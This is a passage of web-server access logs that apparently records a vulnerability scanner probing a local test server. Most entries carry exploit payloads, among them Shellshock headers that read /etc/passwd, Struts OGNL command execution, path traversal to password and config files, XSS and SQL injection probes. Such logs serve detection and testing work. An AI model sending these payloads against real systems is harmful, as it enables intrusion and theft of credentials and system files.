Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/admin/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_run.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ADSearch.cc?methodToCall=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipython/tree HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/selector/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event3=352513&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/login/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /intikal/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/status/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysqldump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/slogin/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"() { :; }; echo ; echo ; /bin/cat /etc/passwd", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comm.php?id=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/api/security/auth/loginServers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cpqlogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"\x0D\x0A\x0D\x0Aextended_version\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ghost/preview HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elocker_old/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 